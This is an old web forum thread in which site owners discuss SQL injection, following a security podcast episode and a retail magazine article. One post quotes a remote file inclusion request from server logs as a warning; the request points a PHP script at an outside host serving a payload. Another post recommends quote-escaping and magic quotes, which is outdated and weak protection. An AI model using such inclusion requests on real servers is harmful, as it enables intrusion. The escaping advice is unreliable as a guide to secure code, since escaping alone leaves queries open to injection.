Results 1 to 7 of 7
  1. #1
    Comfortably Numb John Powell's Avatar
    Join Date
    October 17th, 2005
    Location
    Bayou Country, LA
    Posts
    3,432
    SQL Injection Exploit
    I have followed Steve Gibson for quite some time. I was mostly interested in his PC security information. He has a good test for your firewall and other neat stuff.

    Today he caught my attention with
    Security Now! Episode 87:
    SQL Injection Exploits
    Leo and I wrap up our three-part series on web-based code injection vulnerabilities and exploitation with a discussion web-based structured query language (SQL) database attacks. We explain why and how SQL injection vulnerabilities are creating an ongoing plague of vulnerabilities besetting modern 'Web 2.0' applications.
    There is a link to the audio version or the html version.

    I must like to have extra stuff to worry about.

  2. #2
    general fuq mrbshouse's Avatar
    Join Date
    January 18th, 2005
    Location
    Argieville
    Posts
    1,381
    Bumpaw,

    Thanks for raising the flag! Anyone that is running prescripted code like coppermine and many others will want to do some research on this. I used the html version and found the topic about 3/4 the way down the page. (remove url if need be grc.com/sn/SN-087.htm )

    Anyone that is running thier own apache server might be able to head it ALL off at the pass with some modifications to mod_security. Looks like i have a new more important project for the night :-(

    back to learning more...
    Last edited by Leader; April 19th, 2007 at 09:04 PM. Reason: Got rid of icon that was unintentionally showing up

  3. #3
    general fuq mrbshouse's Avatar
    Join Date
    January 18th, 2005
    Location
    Argieville
    Posts
    1,381
    Leader,

    unintended but worked for me ;-)


    Bumpaw I can't thank you enough for pointing this out. I always new this was something i needed to know more about, but i had no idea what i was looking at in the logs until tonight.

    after doing a bit of learning on this I was shocked how easy SQL can be used to exploit the servers, so I went into my logs and sent no less than 10 hack abuse letters to servers across the globe. If you see any URLs in your logs that reffer to another site such as

    //phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=http://www.come~get~my~virusDOTno/stephan/templates/namibia_css/freeman.txt?
    someone is knocking at your door....how will you answer?

    If you are using SQL/mySQL and php at all you need to pay attention!

  4. #4
    Comfortably Numb John Powell's Avatar
    Join Date
    October 17th, 2005
    Location
    Bayou Country, LA
    Posts
    3,432
    There is a nice article entitled "The scary part of online retailing: Hackers are easily finding the unlocked doors" in April issue of Internet Retailer. They talk a lot about SQL Injection and then further down say:
    Looking at other e-commerce security trends, we expect the wildly popular PHP open-source programming language to continue to provide a bounty of opportunities for hackers.
    I really enjoy that magazine. I have been getting it for free for months, and I'm not sure what I did for that. Seems like I went on their site and signed up for a trial, but it sure has gone long.

  5. #5
    ABW Ambassador Snib's Avatar
    Join Date
    January 18th, 2005
    Location
    Virginia
    Posts
    5,303
    Yes, SQL injection is very serious and many of us are vulnerable already. It's important to always use quotes in your queries and backslash the quotes in user submitted content. If you're inserting a number, quote it anyway to be safe. It's also a good idea to screen the data that comes through to make sure you're getting valid inputs. Just because you've got a select box it doesn't mean somebody won't try to enter a value you didn't provide. To be on the safe side you should enable magic quotes so any user submitted content is automatically backslashed. But even then you need to be aware of the potential problem and keep it in mind when taking content from users.

    And I agree, Internet Retailer is great!

    - Scott
    Hatred stirs up strife, But love covers all transgressions.

  6. #6
    Resident Genius and Staunch Capitalist Leader's Avatar
    Join Date
    January 18th, 2005
    Location
    Florida
    Posts
    12,817
    Leader,

    unintended but worked for me ;-)
    I actually had a motive for changing it: I had forgotten just what keyword brought up that little bottle, so I couldn't tell what you were trying to say until I disabled it ;)

    "prescriptioned" code just didn't make sense! :p
    There is no knowledge that is not power. ~Hemingway

  7. #7
    CPA Network Rep adFinityJoe's Avatar
    Join Date
    March 25th, 2007
    Location
    Southern California
    Posts
    230
    It's good to see that this issue is still getting coverage. SQL programmers on PHP or ASP need to keep addressing this issue, because the hackers sure haven't forgotten.

  8. Newsletter Signup

+ Reply to Thread

Similar Threads

  1. RoundCube Exploit
    By John Powell in forum Midnight Cafe'
    Replies: 0
    Last Post: January 8th, 2009, 10:36 AM
  2. DNS exploit in the news
    By MnemonicGuy in forum Midnight Cafe'
    Replies: 1
    Last Post: July 25th, 2008, 12:03 PM
  3. Google Reader (and perhaps others) Spam Injection
    By Kevin in forum Blogging, Mobile and Social Media
    Replies: 1
    Last Post: May 5th, 2008, 09:26 PM
  4. Preventing SQL injection attacks
    By PatrickAllmond in forum Programming / Datafeeds / Tools
    Replies: 10
    Last Post: October 22nd, 2007, 06:58 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •